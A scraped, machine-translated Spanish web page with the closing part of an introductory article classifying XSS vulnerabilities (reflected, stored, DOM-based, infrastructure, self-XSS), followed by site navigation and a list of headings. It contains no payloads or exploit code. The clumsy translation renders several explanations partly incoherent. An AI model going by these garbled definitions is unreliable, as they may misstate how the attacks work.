src='https://i2.wp.com/anti-malware.ru/files/sucuri-blog-xss-types.png' width="100%" loading=lazy loading=lazy></b></p> <p><b>Vulnerabilidades causadas por código en el lado del servidor (Java, PHP, .NET, etc.):</b></p> <p>Ataques tradicionales XSS:</p> <ol><li>Reflejado (no permanente). El ataque XSS reflejado se activa cuando el usuario va a un enlace especialmente preparado. Estas vulnerabilidades aparecen cuando los datos proporcionados por el cliente web se encuentran con mayor frecuencia en los parámetros de la consulta HTTP o en forma de HTML se ejecutan directamente por scripts de servidor a análisis sintáctico y visualizar la página de resultados de este cliente, sin procesamiento adecuado.</li> <li>Almacenado (constante). Los XS almacenados son posibles cuando un atacante logra implementar un código malicioso en el servidor, ejecutándose en el navegador cada vez que accede a la página original. El ejemplo clásico de esta vulnerabilidad son foros en los que se le permite dejar comentarios en formato HTML.</li> </ol><p><b>Vulnerabilidades causadas por el código en el lado del cliente (JavaScript, Visual Basic, Flash, etc.):</b></p> <p>También conocidos como modelos DOM:</p> <ol><li>Reflejado (no permanente). Lo mismo que en el caso del lado del servidor, solo en este caso, el ataque es posible debido al hecho de que el código es procesado por el navegador.</li> <li>Almacenado (constante). Similar al almacenamiento de XSS en el lado del servidor, solo en este caso, el componente malicioso se guarda en el lado del cliente con el almacenamiento del navegador.</li> </ol><p><b>Vulnerabilidades causadas por infraestructura (navegador, complementos, servidores, etc.):</b></p> <p>Hay muy raros, pero son más peligrosos:</p> <ol><li>Infraestructura en el lado del cliente. Sucede cuando el componente malicioso hace cualquier manipulación con la funcionalidad del navegador, por ejemplo, con su filtro XSS, etc.</li> <li>Infraestructura en el lado del servidor. Ocurre cuando el servidor web procesa incorrectamente las solicitudes, lo que les permite modificarlas.</li> <li>Neto. Sucede cuando es posible implementar en contacto entre el cliente y el servidor.</li> </ol><p><b>Vulnerabilidades causadas por el usuario:</b></p> <ol><li>Auto-xss. A menudo sucede como resultado de la ingeniería social cuando el usuario inicia accidentalmente el código malicioso en su navegador.</li> </ol><h2> ¿Cuál es el peligro de XSS?</h2> <p>¿Cómo puedo proteger su sitio de XSS? ¿Cómo verificar el código para la vulnerabilidad? Hay tecnologías como Sucuri Firewall específicamente diseñadas para evitar ataques similares. Pero si su desarrollador, definitivamente querrá aprender más sobre cómo identificar y eliminar las vulnerabilidades XSS. Hablaremos de esto en la siguiente parte del artículo XSS.</p> <script type="text/javascript">  </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="post-share"> <div class="post-share__title">¿Te gustó el artículo? Compártelo</div> <script src="//yastatic.net/share/share.js"></script><div class="yashare-auto-init" data-yashareL10n="ru" data-yashareType="small" data-yashareQuickServices="vkontakte,facebook,twitter,odnoklassniki,moimir" data-yashareTheme="counter"></div> </div> <div style="text-align: center; margin-top: 10px; margin-bottom: 50px; " id="sovet-1558718318" data-cfpa="13825"><div style="clear: both; font:16px/44px 'Ubuntu', sans-serif; display:inline-block;"> </div></div><script type="text/javascript">;new advadsCfpAd( 13825 );</script> <div class='yarpp-related'> <div class="related-items"> <div class="headline">Artículos recomendados sobre el tema.</div> <div class="items"> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/es/tips/tehnologiya-izmereniya-ferromagnitnymi-zondami-magnitometriya-v-prosteishem-variante-ferrozond-sostoit.html"><img src="/uploads/a567b1fe157c9401f3de05cde7acb9ae.jpg" width="200" height="200" alt="Magnetometría en la versión más sencilla El Ferrozond consiste en un núcleo ferromagnético y dos bobinas en él" class="item__image" / loading=lazy loading=lazy>Magnetometría en la versión más sencilla El Ferrozond consiste en un núcleo ferromagnético y dos bobinas en él</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/es/asus/intensivnyi-kurs-po-poisku-raboty-effektivnyi-poisk-raboty-kurs-po.html"><img src="/uploads/653f224afa414d6b546a047b21ade39c.jpg" width="200" height="200" alt="Búsqueda de curso de búsqueda de trabajo efectivo" class="item__image" / loading=lazy loading=lazy>Búsqueda de curso de búsqueda de trabajo efectivo</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/es/the-lg-tvs/fotodiody-princip-raboty-osnovnye-harakteristiki-osnovnye.html"><img src="/uploads/a1489013baec95aba72bad70ad2a99f5.jpg" width="200" height="200" alt="Las principales características y parámetros del fotodiodo." class="item__image" / loading=lazy loading=lazy>Las principales características y parámetros del fotodiodo.</a> <div class="item__comments"></div> </div> </div> </div> </div> </div> <div style="text-align: center; margin-top: 30px; margin-bottom: 30px; " id="sovet-1702503440" data-cfpa="18987"><style type="text/css"> .gadsense_slot_2{ display: inline-block; width: 746px; height: 300px;} @media (min-width:300px) { .gadsense_slot_2 { width: 300px; height: 300px; } } @media (min-width:800px) { .gadsense_slot_2 { width: 600px; height: 300px; } } @media (min-width:1024px) { .gadsense_slot_2 { width: 746px; height: 300px; } } </style> </div><script type="text/javascript">;new advadsCfpAd( 18987 );</script> </main> <aside class="sidebar"> <div class="subs"> <div class="subs-soc"> <div class="subs-soc-title">Únete a Social. Redes</div> <ul> <li><a href="https://facebook.com/" target="_blank" class="fb">Facebook.</a></li> <li><a href="https://twitter.com/" target="_blank" class="twi">Gorjeo.</a></li> <li><a href="" target="_blank" class="vk">En contacto con</a></li> <li><a href="" target="_blank" class="ok">Odnoklassniki.</a></li> <li><a href="https://youtube.com/" target="_blank" class="yt">YouTube.</a></li> </ul> </div> </div> <div class="section section--companies"> <div class="headline center">Materiales populares</div> <ul> <li><a href="https://newtravelers.ru/es/iphoneipad/specialnost-zashchita-informacii-gde-rabotat-professiya---specialist-po.html" ><img src="/uploads/46c6a7e09a42442c3eaa9b7d93fbbce8.jpg" width="74" height="74" alt="Profesión - Especialista en seguridad de la información." / loading=lazy loading=lazy><span>Profesión - Especialista en seguridad de la información.</span></a></li> <li><a href="https://newtravelers.ru/es/android/umenshaem-razmer-pdf-redaktirovanie-izmenenie-razmerov-i-pechat.html" ><img src="/uploads/a4f42dcaad458b3b3500d41a2ed4f177.jpg" width="74" height="74" alt="Edición, cambio de tamaño e imprimir PDF Ampliar archivo PDF" / loading=lazy loading=lazy><span>Edición, cambio de tamaño e imprimir PDF Ampliar archivo PDF</span></a></li> <li><a href="https://newtravelers.ru/es/d-link/skorost-1-megabit-kakaya-skorost-domashnego-interneta-nuzhna-vam-na-samom-dele.html" ><img src="/uploads/bf13c6de624891f9dd8df6ceaade7b3b.jpg" width="74" height="74" alt="¿Cuál es la velocidad de la casa de Internet?" / loading=lazy loading=lazy><span>¿Cuál es la velocidad de la casa de Internet?</span></a></li> <li><a href="https://newtravelers.ru/es/tenda/bystryi-prosmotr-failov-cdw-v-total-commander-prosmotr-kartinok-total-commander.html" ><img src="/uploads/bfbae1d1107fb514872478dcd97c539a.jpg" width="74" height="74" alt="Ver imágenes del comandante total" / loading=lazy loading=lazy><span>Ver imágenes del comandante total</span></a></li> <li><a href="https://newtravelers.ru/es/iphoneipad/bystryi-prosmotr-failov-cdw-v-total-commander-prosmotr-kartinok-total-commander-bystrye.html" ><img src="/uploads/ba8bc2f6519da65408779736622829e8.jpg" width="74" height="74" alt="Ver imágenes del comandante total" / loading=lazy loading=lazy><span>Ver imágenes del comandante total</span></a></li> </ul> </div> <nav class="section section--calc"> <div class="headline center">Nuevo en el sitio</div> <ul> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/es/problems/skachat-cat-programmu-dlya-perevodov-kak-rabotaet-perevodchik-frilanser.html">¿Cómo funciona el traductor independiente?</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/es/wireless/kak-konvertirovat-peredelat-preobrazovat-shemu-iz-visio-v.html">Documento en los esquemas de proceso de Visio en la impresión de contorno de Word Vord Visio</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/es/setting/podtverzhdenie-o-prochtenii-pisma-outlook-nastraivaem-v-microsoft-outlook-chtenie.html">Personalizar en Microsoft Outlook Lectura de mensajes y notificaciones</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/es/setting/eksport-tochek-v-txt-iz-chertezha-autocad-eksport-koordinat-iz-cad-v-txt.html">Exportar coordenadas de CAD a TXT</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/es/setting/universalnyi-perevodchik-v-odin-klik-pyat-besplatnyh-programm-dlya-bystrogo.html">En un solo clic: cinco programas gratuitos para traducciones rápidas de textos</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/es/wireless/excel-kodirovka-csv-vybor-kodirovki-teksta-pri-otkrytii-i-sohranenii-failov-kak.html">Seleccione la codificación de texto al abrir y guardar archivos</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://newtravelers.ru/es/bluetooth/sozdanie-ukazatelya-terminov-kak-v-word-ustanovit-dlya-proverki-pravopisaniya.html">Cómo instalar para verificar la ortografía utilizando solo el diccionario principal Cómo hacer términos de brillo en Word</a></li> </ul> <div class="section--calc__all"> </div> </nav> </aside> </div> <div class="popular popular-in-cat"> <div class="headline center" id="stop_ads">Los visitantes ahora están discutiendo</div> <div class="items"> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/es/wireless/kak-redaktirovat-pdf-luchshie-besplatnye-programmy-kak-redaktirovat-pdf.html"><img src="/uploads/45e4fe56a2dda003d656a77ac96741b8.jpg" width="200" height="200" alt="Cómo editar PDF (cinco aplicaciones para cambiar archivos PDF) Cómo eliminar páginas individuales de PDF" class="item__image" / loading=lazy loading=lazy>Cómo editar PDF (cinco aplicaciones para cambiar archivos PDF) Cómo eliminar páginas individuales de PDF</a> <a class="item__cat" href="https://newtravelers.ru/es/category/wireless/">Inalámbrica</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/es/iphoneipad/otkrytye-okna-na-paneli-zadach-ne-razvorachivayutsya-v-windows-reshenie.html"><img src="/uploads/d29077e38668e708badbe639bf9c8573.jpg" width="200" height="200" alt="¿Por qué la ventana del programa de despedida se desarrolla durante mucho tiempo?" class="item__image" / loading=lazy loading=lazy>¿Por qué la ventana del programa de despedida se desarrolla durante mucho tiempo?</a> <a class="item__cat" href="https://newtravelers.ru/es/category/iphoneipad/">iPhone / iPad.</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/es/problems/dxf2txt-eksport-i-perevod-teksta-iz-autocad-dxf2txt-eksport-i-perevod-teksta-iz-autocad.html"><img src="/uploads/28e0489a34cd55f527ec88cff5cab0b7.jpg" width="200" height="200" alt="DXF2TXT - Exportación y traducción del texto desde AutoCAD para mostrar un punto de tráfico DWG en TXT" class="item__image" / loading=lazy loading=lazy>DXF2TXT - Exportación y traducción del texto desde AutoCAD para mostrar un punto de tráfico DWG en TXT</a> <a class="item__cat" href="https://newtravelers.ru/es/category/problems/">Problemas</a> <div class="item__comments"></div> </div> </div> <div class="item"> <div class="item__inner"> <a class="item__title" href="https://newtravelers.ru/es/setting/propadaet-kursor-v-vorde-chto-delat-chto-delat-esli-propal-kursor-myshi-pochemu.html"><img src="/uploads/d18ebaef8d272fa8057baa4ed27740e7.jpg" width="200" height="200" alt="Qué hacer si el cursor del mouse desaparece." class="item__image" / loading=lazy loading=lazy>Qué hacer si el cursor del mouse desaparece.</a> <a class="item__cat" href="https://newtravelers.ru/es/category/setting/">Configuración</a> <div class="item__comments"></div> </div> </div> </div> </div> <footer class="footer"> <div class="footer__copyright"> <div class="footer__logo">newtravelers.ru.</div> <p>© 2021 - newtravelers.ru</p> <p>Consejos para configurar Android, enrutadores, TV inteligente. Bluetooth</p> </div> <nav class="footer__nav-1"><ul> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/es/category/problems/">Problemas</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/es/category/android/">Androide</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/es/category/setting/">Configuración</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/es/category/error/">Errores</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/es/category/setting/">Configuración</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://newtravelers.ru/es/category/bluetooth/">Bluetooth</a></li> </ul></nav> <div class="footer__nav-2"> <nav><ul> <li class="menu-item type-post_type object-page "><a href="">Contactos</a></li> <li class="menu-item type-post_type object-page "><a href="">Publicidad en el proyecto.</a></li> <li class="menu-item type-post_type object-page "><a href="https://newtravelers.ru/es/sitemap.xml">Mapa del sitio `s</a></li> <li class="menu-item type-post_type object-page "><a href="">Copyright y reglas</a></li> </ul></nav> <ul class="footer__soc"> <li><a href="" target="_blank" class="vk">En contacto con</a></li> <li><a href="" target="_blank" class="ok">Odnoklassniki.</a></li> <li><a href="https://facebook.com/" target="_blank" class="fb">Facebook.</a></li> <li><a href="https://twitter.com/" target="_blank" class="twi">Gorjeo.</a></li> </ul> </div> <div class="footer-right"> <div class="footer__counters" id="text-6"> <div class="textwidget"><p></p> </div> </div> <div class="footer__orphus"> <div>Nuestro error en el sitio? Resaltarlo y presione CTRL + ENTER</div> </div> </div> </footer> </div> </div> <script type="text/javascript">jQuery(function($) { $(document).on("click", ".pseudo-link", function(){ window.open($(this).data("uri")); } );} );</script><script type='text/javascript' src='https://newtravelers.ru/wp-content/themes/sovet-ingenera_adapt/js/baron.min.js'></script> <script type='text/javascript' src='/assets/scripts1.js'></script> <script type='text/javascript' src='/wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var tocplus = { "smooth_scroll":"1"} ; /* ]]> */ </script> <script type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/table-of-contents-plus/front.min.js'></script> <script type='text/javascript'> var q2w3_sidebar_options = new Array(); q2w3_sidebar_options[0] = { "sidebar" : "fixed-sidebar", "margin_top" : 0, "margin_bottom" : 0, "stop_id" : "stop_ads", "screen_max_width" : 0, "screen_max_height" : 0, "width_inherit" : false, "refresh_interval" : 1500, "window_load_hook" : false, "disable_mo_api" : false, "widgets" : ['text-7'] } ; </script> <script type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js'></script> <script type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/wp-featherlight/js/wpFeatherlight.pkgd.min.js'></script> <script type='text/javascript' src='/wp-includes/js/wp-embed.min.js'></script> <script async="async" type='text/javascript' src='https://newtravelers.ru/wp-content/plugins/akismet/_inc/form.js'></script> <script type="text/javascript">  </script><br> <br> </body> </html>

Formación de ataque XSS. Vulnerabilidad XSS - ¿Qué es? Ejemplos de vulnerabilidades XSS. Datos de formularios llenos

Tipos de XSS.

Características XSS basadas en DOM

Auditor XSS

Ejemplos de explotación XSS.

Programas para búsqueda y escaneo Vulnerabilidad XSS

XSS: Vulnerabilidad de la inyección

Ataques tradicionales XSS:

Reflejado (no permanente).

Almacenado (constante).

Vulnerabilidades causadas por el código en el lado del cliente (JavaScript, Visual Basic, Flash, etc.):

También conocidos como modelos DOM:

Reflejado (no permanente).

Almacenado (constante).

Ejemplos de vulnerabilidades XSS.

Galletas